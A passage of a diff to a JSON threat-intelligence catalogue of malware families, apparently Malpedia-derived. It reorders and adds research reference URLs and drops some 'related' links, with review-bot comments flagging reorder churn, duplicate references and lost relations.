- "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/",
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware",
"https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market",
"https://twitter.com/3xp0rtblog/status/1321209656774135810",
- "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf"
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware",
+ "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
],
"synonyms": [],
"type": []
@@ -23160,8 +24594,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems"
],
"synonyms": [],
"type": []
@@ -23188,8 +24622,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blogs.cisco.com/security/talos/poseidon",
- "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/"
+ "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/",
+ "https://blogs.cisco.com/security/talos/poseidon"
],
"synonyms": [
"Poseidon"
@@ -23204,27 +24638,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher",
- "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
- "https://securelist.com/finspy-unseen-findings/104322/",
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/",
- "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
- "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues",
- "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
- "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization",
"https://www.msreverseengineering.com/blog/2018/2/21/finspy-vm-unpacking-tutorial-part-3-devirtualization",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization",
- "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
- "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye",
- "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2",
- "https://github.com/RolfRolles/FinSpyVM",
- "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html",
- "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/",
"https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html",
+ "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues",
+ "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2",
+ "https://netzpolitik.org/2022/nach-pfaendung-staatstrojaner-hersteller-finfisher-ist-geschlossen-und-bleibt-es-auch/",
+ "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye",
+ "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html",
+ "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization",
+ "https://github.com/RolfRolles/FinSpyVM",
+ "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
+ "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization",
+ "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/",
+ "https://securelist.com/finspy-unseen-findings/104322/"
],
"synonyms": [
"FinSpy"
@@ -23244,15 +24679,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "968df869-7f60-4420-989f-23dfdbd58668",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9ad28356-184c-4f02-89f5-1b70981598c3",
"value": "Fireball"
},
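Review bot: pure removal of the `related` entry (dest-uuid 968df869-7f60-4420-989f-23dfdbd58668) with no other change to the Fireball cluster; this is one of six such removals in this part of the patch (EtumBot, EvilGrab, Fanny, Feodo, Fireball, FireMalv), so one sentence in the commit message explaining why `related` links are being dropped would cover them all.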
@@ -23306,15 +24732,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "6ef11b6e-d81a-465b-9dce-fab5c6fe807b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c",
"value": "FireMalv"
},
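Review bot: same as the Fireball hunk: the `related` link to 6ef11b6e-d81a-465b-9dce-fab5c6fe807b is removed from FireMalv and nothing else changes.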
@@ -23337,6 +24754,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster",
"https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
"https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/"
],
"synonyms": [
@@ -23352,18 +24770,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands",
- "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
"https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/",
- "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+ "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/"
],
"synonyms": [
"Thieflock"
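Review bot: this hunk is a pure reorder of the win.fivehands `refs` array; all seven removed URLs (`ar21-126a`, the CrowdStrike Golang packer post, the Symantec September 2021 PDF, the FireEye UNC2447 write-up, the Microsoft RaaS post, the eSentire Conti post, the BleepingComputer Yanluowang story) reappear as additions, so no reference is added or dropped. If the list is regenerated from Malpedia in whatever order the upstream API returns it, consider sorting `refs` deterministically (Malpedia canonical URL first, then the rest in a stable order) so future diffs only show real changes.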
@@ -23378,11 +24796,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro",
- "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech",
"https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/",
+ "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro",
+ "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech",
"https://vblocalhost.com/uploads/VB2021-50.pdf",
"https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf",
- "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro"
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [
"BUSYICE"
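Review bot: the only substantive change here is the new `https://jp.security.ntt/resources/EN-BlackTech_2021.pdf` reference; the two `insight-jp.nttsecurity.com` posts are merely moved. The reorder churn hides that this hunk adds exactly one ref, which is worth stating in the commit message.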
@@ -23397,28 +24816,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flame",
- "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache",
- "https://www.crysys.hu/publications/files/skywiper.pdf",
"https://securelist.com/the-flame-questions-and-answers-51/34344/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
"https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://github.com/juanandresgs/papers/raw/master/Flame%202.0%20Risen%20from%20the%20Ashes.pdf",
+ "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.crysys.hu/publications/files/skywiper.pdf"
],
"synonyms": [
"sKyWIper"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d7963066-62ed-4494-9b8c-4b8b691a7c82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e",
"value": "Flame"
},
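Review bot: the `related` entry pointing at `dest-uuid` `d7963066-62ed-4494-9b8c-4b8b691a7c82` (type `similar`, tagged almost-certain) is dropped with nothing replacing it, so the cross-galaxy link from Flame to that cluster is lost; if the relation is now produced elsewhere by the galaxy tooling, say so in the commit message, otherwise keep the block. Also, the added `https://github.com/juanandresgs/papers/raw/master/Flame%202.0%20Risen%20from%20the%20Ashes.pdf` is a mirror of the `storage.googleapis.com/chronicle-research/Flame%202.0...` PDF already in the list, so the same paper is now referenced twice.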
@@ -23427,8 +24838,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
"synonyms": [],
"type": []
@@ -23441,28 +24852,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy",
- "https://attack.mitre.org/software/S0381/",
- "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
"https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
- "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/",
"https://habr.com/ru/company/pt/blog/475328/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat",
+ "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
"https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
+ "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://attack.mitre.org/software/S0381/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://www.youtube.com/watch?v=N4f2e8Mygag",
- "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930"
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://intel471.com/blog/a-brief-history-of-ta505"
],
"synonyms": [],
"type": []
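Review bot: pure reorder for win.flawedammyy, 15 refs removed and the same 15 re-added with no content change. While the list is being touched anyway, `https://intel471.com/blog/a-brief-history-of-ta505` and `https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` are the same article on two hostnames and could be collapsed into one entry.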
@@ -23475,21 +24886,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://twitter.com/MsftSecIntel/status/1273359829390655488",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem",
"https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant",
- "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace"
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem",
+ "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
+ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://twitter.com/MsftSecIntel/status/1273359829390655488"
],
"synonyms": [
"GraceWire"
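Review bot: the one real addition is `https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/`; everything else is reordering. The same `intel471.com` / `blog.intel471.com` duplicate of `a-brief-history-of-ta505` that appears in the win.flawedammyy hunk is carried over here, so deduplicate both clusters together.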
@@ -23517,26 +24929,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot",
- "http://adelmas.com/blog/flokibot.php",
- "http://blog.talosintel.com/2016/12/flokibot-collab.html#more",
- "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html",
"https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/",
+ "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/",
"https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/",
- "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/"
+ "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html",
+ "http://adelmas.com/blog/flokibot.php",
+ "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/",
+ "http://blog.talosintel.com/2016/12/flokibot-collab.html#more"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "8034978b-3a32-4662-b1bf-b525e59e469f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "057ff707-a008-4ab8-8370-22b689ed3412",
"value": "FlokiBot"
},
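Review bot: same concern as for Flame: the `related` block linking FlokiBot to `8034978b-3a32-4662-b1bf-b525e59e469f` is removed without a replacement. Since this commit drops relations on several clusters at once, confirm the relation data is being rebuilt by the galaxy tooling rather than silently lost; the `refs` part of the hunk is only a reorder.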
@@ -23545,12 +24948,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud",
- "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
- "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
- "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
"https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis",
- "https://nao-sec.org/2021/01/royal-road-redive.html"
+ "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
+ "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
+ "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis"
],
"synonyms": [],
"type": []
@@ -23563,8 +24966,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf"
+ "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf"
],
"synonyms": [],
"type": []
@@ -23630,11 +25033,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber",
- "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/",
"http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html",
- "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber",
+ "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf",
"http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html",
- "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf"
+ "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber",
+ "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/"
],
"synonyms": [],
"type": []
@@ -23647,8 +25050,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix",
- "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/",
- "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/"
+ "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/",
+ "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/"
],
"synonyms": [],
"type": []
@@ -23661,73 +25064,73 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook",
- "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent",
+ "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://usualsuspect.re/article/formbook-hiding-in-plain-sight",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
"https://www.connectwise.com/resources/formbook-remcos-rat",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/",
"https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?",
+ "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
+ "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/",
+ "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view",
+ "https://youtu.be/aQwnHIlGSBM",
+ "https://link.medium.com/uaBiIXgUU8",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I",
+ "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882",
+ "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/",
+ "https://blog.talosintelligence.com/2018/06/my-little-formbook.html",
+ "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/",
